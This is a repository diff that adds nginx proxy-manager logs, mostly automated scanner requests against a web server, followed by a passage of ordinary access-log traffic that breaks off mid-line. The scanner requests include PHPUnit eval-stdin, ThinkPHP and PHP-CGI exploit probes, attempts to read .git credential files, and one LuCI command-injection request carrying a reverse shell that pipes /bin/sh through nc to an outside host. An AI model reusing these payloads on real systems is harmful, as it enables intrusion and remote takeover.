"/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:34 [error] 962#962: *100695 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:34 [error] 962#962: *100695 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:35 [error] 962#962: *100695 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:35 [error] 962#962: *100695 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:35 [error] 962#962: *100695 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:36 [error] 962#962: *100695 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:36 [error] 962#962: *100695 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:37 [error] 962#962: *100695 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:37 [error] 962#962: *100695 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:37 [error] 962#962: *100695 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:38 [error] 962#962: *100695 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:38 [error] 962#962: *100695 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:38 [error] 962#962: *100695 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:38 [error] 962#962: *100695 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:39 [error] 962#962: *100695 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:39 [error] 962#962: *100695 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:39 [error] 962#962: *100695 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:40 [error] 962#962: *100695 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:40 [error] 962#962: *100695 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:40 [error] 962#962: *100695 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:40 [error] 962#962: *100695 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:41 [error] 962#962: *100695 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:41 [error] 962#962: *100695 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:41 [error] 962#962: *100695 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:42 [error] 962#962: *100695 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:42 [error] 962#962: *100695 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:42 [error] 962#962: *100695 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:43 [error] 962#962: *100695 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:43 [error] 962#962: *100695 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:43 [error] 962#962: *100695 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:44 [error] 962#962: *100695 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:44 [error] 962#962: *100695 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:44 [error] 962#962: *100695 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:45 [error] 962#962: *100695 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:46 [error] 962#962: *100695 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 15:06:35 [error] 962#962: *100697 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 45.148.10.246, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+144.172.73.168+9898+%3E%2Ftmp%2Ff) HTTP/1.1", host: "222.117.41.51" +2026/02/18 15:26:06 [error] 962#962: *100704 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 144.79.133.252, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:02:07 [error] 961#961: *100767 open() "/var/www/html/dispatch.asp" failed (2: No such file or directory), client: 195.3.221.86, server: localhost-nginx-proxy-manager, request: "GET /dispatch.asp HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:21 [error] 963#963: *100770 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:22 [error] 963#963: *100770 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:22 [error] 963#963: *100770 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:22 [error] 963#963: *100770 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:23 [error] 963#963: *100770 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:23 [error] 963#963: *100770 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:23 [error] 963#963: *100770 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:23 [error] 963#963: *100770 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:23 [error] 963#963: *100770 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:24 [error] 963#963: *100770 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:24 [error] 963#963: *100770 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:24 [error] 963#963: *100770 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:24 [error] 963#963: *100770 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:25 [error] 963#963: *100770 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:25 [error] 963#963: *100770 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:25 [error] 963#963: *100770 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:25 [error] 963#963: *100770 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:25 [error] 963#963: *100770 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:26 [error] 963#963: *100770 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:26 [error] 963#963: *100770 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:26 [error] 963#963: *100770 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:26 [error] 963#963: *100770 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:27 [error] 963#963: *100770 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:27 [error] 963#963: *100770 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:27 [error] 963#963: *100770 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:27 [error] 963#963: *100770 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:28 [error] 963#963: *100770 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:28 [error] 963#963: *100770 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:28 [error] 963#963: *100770 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:28 [error] 963#963: *100770 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:29 [error] 963#963: *100770 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:29 [error] 963#963: *100770 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:29 [error] 963#963: *100770 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:29 [error] 963#963: *100770 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:30 [error] 963#963: *100770 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:30 [error] 963#963: *100770 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:30 [error] 963#963: *100770 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:30 [error] 963#963: *100770 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:31 [error] 963#963: *100770 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:31 [error] 963#963: *100770 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:10:31 [error] 963#963: *100770 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 17:17:25 [error] 963#963: *100773 open() "/var/www/html/.git/credentials" failed (2: No such file or directory), client: 195.178.110.246, server: localhost-nginx-proxy-manager, request: "GET /.git/credentials HTTP/1.1", host: "222.117.41.51" +2026/02/18 17:55:39 [error] 963#963: *100791 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 85.11.167.7, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "222.117.41.51" +2026/02/18 18:49:16 [error] 979#979: *100805 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 19:48:55 [error] 972#972: *100824 open() "/var/www/html/ip" failed (2: No such file or directory), client: 87.121.84.172, server: localhost-nginx-proxy-manager, request: "GET http://httpbin.org/ip HTTP/1.1", host: "httpbin.org" +2026/02/18 20:24:48 [error] 973#973: *100856 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 21:03:20 [error] 979#979: *102465 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 115.231.78.11, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "222.117.41.51:80" diff --git a/npm/data/logs/proxy-host-1_access.log b/npm/data/logs/proxy-host-1_access.log index e57b304..5a82420 100644 --- a/npm/data/logs/proxy-host-1_access.log +++ b/npm/data/logs/proxy-host-1_access.log @@ -3651,3 +3651,1939 @@ [17/Feb/2026:02:31:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" [17/Feb/2026:02:31:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" [17/Feb/2026:02:31:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:02:43:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10399] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:02:43:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 